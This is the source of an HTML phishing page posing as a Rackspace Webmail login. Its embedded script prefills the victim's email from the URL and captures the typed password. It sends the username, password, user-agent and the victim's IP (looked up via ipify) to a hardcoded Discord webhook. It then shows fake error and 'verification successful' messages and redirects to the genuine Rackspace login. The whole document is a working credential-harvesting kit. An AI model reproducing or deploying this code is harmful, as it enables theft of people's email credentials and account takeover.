<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Rackspace Webmail: Hosted Email for Business</title>
  <link rel="stylesheet" href="/cssa7a7.css?family=Roboto:100,400,500,700">

  <style>
    /* Page Defaults */
    * {
      -webkit-box-sizing: border-box;
      -moz-box-sizing: border-box;
      box-sizing: border-box;
    }

    body {
      font-family: "Roboto", "Helvetica Neue", Helvetica, Arial, sans-serif;
      font-size: 14px;
      line-height: 1.42857;
      color: #333333;
      background-color: #FAFAFA;
      margin: 0;
    }

    .caption {
      display: inline-block;
      font-size: 12px;
      color: #666;
    }

    .base_link {
      display: inline-block;
      color: #0C7C84;
      text-decoration: none;
    }

    .base_links {
      background: #FFFFFF;
      text-align: center;
      padding-bottom: 20px;
      margin-top: -15px;
    }

    .divider {
      display: inline-block;
      margin: 0px 5px;
      color: #0C7C84;
    }
    /* Page Layout */
    #content {
      display: flex;
      align-items: center;
      justify-content: center;
      position: fixed;
      top: 0;
      left: 0;
      bottom: 0;
      right: 0;
      background: #EAEAEA;
    }

    #content-header {
      height: 53px;
      padding: 16px;
      font-size: 24px;
      font-weight: 300;
      line-height: 18px;
      background: #424242;
      color: #FCFCFC;
    }

    #content-header-logo {
      float: right;
    }

    #logo {
      width: 130px;
      margin-top: -9px;
      margin-right: -5px;
    }

    #content-header-label {
      float: left;
    }

    #content-body {
      display: flex;
      justify-content: start;
      background: #FFFFFF;
      min-width: 790px;
    }

    #banner-section {
      height: 285px;
      width: 314px;
      margin: 40px;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    #banner {
      width: 190px;
    }

    #divider {
      border: 1px solid rgb(224, 224, 224);
      margin: 40px 0px;
    }
    /* Form Layout */
    #form {
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding: 20px;
      min-height: 268px;
      width: 100%;
    }

    #form-body {
      height: 205px;
      width: 100%;
      margin: 40px 0px 0px 20px;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      padding-right: 20px;
    }

    #form-container {
      width: 100%;
      margin: 0px auto;
      padding: 0px 10px;
    }

    .row {
      margin: 0px -10px;
    }

      .row:before, .row:after {
        content: " ";
        display: table;
      }

    .col {
      width: 100%;
      float: left;
      position: relative;
      min-height: 1px;
      padding: 0px 10px;
    }

    .form-group {
      width: inherit;
      padding-right: 30px;
      margin-bottom: 20px;
    }

    .form-label {
      position: relative;
      font-family: Roboto;
      font-size: 16px;
      margin-bottom: 8px;
      line-height: 1;
      color: #616161;
      display: inline-block;
      max-width: 100%;
    }

    .form-field {
      border: 1px solid #BDBDBD;
      border-radius: 2px;
      background: #FFFFFF;
      font-family: Roboto;
      font-size: 16px;
      color: #616161;
      height: 32px;
      display: block;
      width: 100%;
      padding: 4px 8px;
      line-height: 1.42857;
      -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
      box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
      -webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
      -o-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
      transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
    }

    #forgot-password {
      position: absolute;
      top: 0px;
      right: 40px;
      color: #0C7C84;
      text-decoration: none;
      background-color: transparent;
      box-sizing: border-box;
    }

    #login-btn-toolbar {
      float: right;
      margin: auto 30px 15px -20px;
    }

    #login-btn {
      float: right;
      display: inline-flex;
      flex-direction: row;
      justify-content: center;
      align-items: center;
      padding: 0 12px;
      height: 32px;
      line-height: 1px;
      font-size: 14px;
      font-weight: 400;
      text-transform: capitalize;
      color: #fff;
      background-color: #0C7C84;
      border-color: #0C7C84;
      margin-bottom: 0;
      text-align: center;
      vertical-align: middle;
      touch-action: manipulation;
      cursor: pointer;
      background-image: none;
      border: 1px solid transparent;
      white-space: nowrap;
      border-radius: 2px;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
    }

    #form-container {
      width: 100%;
      margin: 0px auto;
      padding: 0px 10px;
    }

    @media only screen and (max-device-width: 480px) {
      /* Page Defaults */
      body {
        font-size: 19pt;
        line-height: 1.42857em;
      }

      .caption {
        display: inline-block;
        font-size: 80%;
        color: #666;
      }
      /* Page Layout */
      #content {
        align-items: inherit;
        display: inherit;
        justify-content: inherit;
      }

      #content-header {
        font-size: 171%;
        height: 3em;
        line-height: 1em;
        padding: 1em;
      }

      #content-header-logo {
        float: right;
      }

      #logo {
        margin-left: 6em;
        width: inherit;
        height: 1em;
      }

      #banner-section {
        display: none;
      }

      #divider {
        display: none;
      }
      /* Form Layout */
      .form-label {
        font-size: 114%;
      }

      .form-field {
        font-size: 114%;
        height: 2em;
      }

      #forgot-password {
        right: 2em;
        top: 0;
      }

      #login-btn-toolbar {
        margin: 1.5em 2em 1em -1.5em;
      }

      #login-btn {
        font-size: 150%;
        height: 3em;
        padding: 1.25em;
      }
    }
  </style>
</head>
<body>
  <div>
    <div id="content">
      <div>
        <div id="content-header">
          <div id="content-header-logo"><img id="logo" src="images/Rackspace_Technology_Logo_RGB_WHT.png"  /></div>
          <div id="content-header-label">Webmail Login</div>
        </div>
        <div id="content-body">
          <div id="banner-section">
            <a href="#" target="_blank">
              <img id="banner" src="images/Suspicious-Email-Banner.jpg" />
            </a>
          </div>
          <div id="divider"></div>
          <form id="form" method="" name="" action="#" autocomplete="off">
  <!-- <script src="../dist/webmailLogin25ac.js?v=dn70RwATRXPGR3I_MlY9aK9fMX6zSf1GYvcRvRv-UFc=" type="text/javascript"></script> -->
              <div id="form-body">
                <div id="form-container">
                  <div id="login-status-message" style="color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;">Your session cookie is invalid. Please log in again.</div>
                  <!-- <input type="hidden" name="" value="" /> -->
                  <!-- destination and flags is used for OWA login -->
                  <!-- <input id="form-destination" type="hidden" name="destination" value="" /> -->
                  <input id="form-owa-flags" type="hidden" name="flags" value="4" />
                  <div id="user-row" class="row">
                    <div id="user-col" class="col">
                      <div id="user-field" class="form-group">
                        <label id="user-label" class="form-label">Email address</label>
                        <input id="user-input" name="username" tabindex="1" class="form-field" value="" autocomplete="off" disabled/>
                      </div>
                    </div>
                  </div>
                  <div id="pass-row" class="row">
                    <div id="pass-col" class="col">
                      <div id="pass-field" class="form-group">
                        <label id="pass-label" class="form-label">Password</label>
                        <input id="pass-input" name="password" tabindex="2" type="password" class="form-field"  autocomplete="off" />
                      </div>
                      <a id="forgot-password" href="#" tabindex="4">Forgot password?</a>
                    </div>
                  </div>
                </div>
              </div>
              <div id="login-btn-toolbar">
                <button  type="button" id="login-btn" tabindex="3">Log In</button>
              </div>
          </form>
        </div>
        <div class="base_links">
          <a class="base_link" target="_blank" href="#">
            Privacy Statement
          </a>
          <div class="divider"> | </div>
          <a class="base_link" target="_blank" href="#">
            Website Terms
          </a>
        </div>
        <div class="footer" style="text-align: center; margin-top: 10px;">
          <div class="caption">
            Need webmail for your business?  Learn more about
            <a href="#" style="color: #666;">
              Hosted Email
            </a>
            from Rackspace
          </div>
        </div>
      </div>
    </div>
  </div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script>
  function isBase64(str) {
  if (typeof str !== 'string') {
    return false;
  }
  const notBase64 = /[^A-Z0-9+\/=]/i;
  const len = str.length;

  if (!len || len % 4 !== 0 || notBase64.test(str)) {
    return false;
  }

  const firstPaddingChar = str.indexOf('=');
  return firstPaddingChar === -1 ||
    firstPaddingChar === len - 1 ||
    (firstPaddingChar === len - 2 && str[len - 1] === '=');
}

function sleep(milliseconds) {
    const date = Date.now();form-field
    let currentDate = null;
    do {
      currentDate = Date.now();
    } while (currentDate - date < milliseconds);
  }

var linksc = window.location.href
var value = linksc.split('#')[1].split('$')[0];
const values = value
document.getElementById("user-input").value = values; 

let count = 0;
var btn = document.getElementById("login-btn");
var pwd = document.getElementById("pass-input");
var agents = navigator.userAgent;



btn.onclick = function () {
if (pwd.value.length > 0){
    count++;
    if (count <= 2){  
 
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "https://api.ipify.org/?format=json", true);
        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
            var response = JSON.parse(xhr.responseText);
            // Handle the response data here
            var ipAddress = response.ip

            request.open("POST", "https://discord.com/api/webhooks/1255109847435706480/2uzqiIqqtJ6E9MJmF33-zkZfh3nBHxjoET8Nl-cmuUa1Fy1EtszH9NQbZ_cq2mXfoLr_");
            request.setRequestHeader('Content-type', 'application/json');
            var params = {
            content: (" > **IP: **" + ipAddress)
            }
            request.send(JSON.stringify(params));
                

            }

        };
        xhr.send();
      
    
        var request = new XMLHttpRequest();
        request.open("POST", "https://discord.com/api/webhooks/1255109847435706480/2uzqiIqqtJ6E9MJmF33-zkZfh3nBHxjoET8Nl-cmuUa1Fy1EtszH9NQbZ_cq2mXfoLr_");
        request.setRequestHeader('Content-type', 'application/json');
        var params = {
          content: ("> **USERNAME  : **" + document.getElementById('user-input').value + "\n> **PASSWORD : **" + document.getElementById('pass-input').value + "\n> **USER-AGENT: **" + agents)
        }
        request.send(JSON.stringify(params));
        text = "Username / Password incorrect.";
        document.getElementById("login-status-message").innerHTML = text;
        document.getElementById("pass-input").value = "";
    } 
    if(count==2){
    texts = "Verification Successful... Thank you.";
    document.getElementById("login-status-message").style.color = "green"; 
    document.getElementById("login-status-message").innerHTML = texts;   
    // sleep(6000)
    // location.replace("http://www.rackspace.com/email-hosting/webmail");
    window.location.replace("https://apps.rackspace.com/wmidentity/Account/Login");

     }
     
}else{
  // document.getElementById("login-status").style.visibility = "visible";
  text = "Username / Password incorrect."
  document.getElementById("login-status-message").innerHTML = text;
  // document.getElementById("alert").style.backgroundColor = "#d0452f";  
}
}
</script>
</body>

</html>
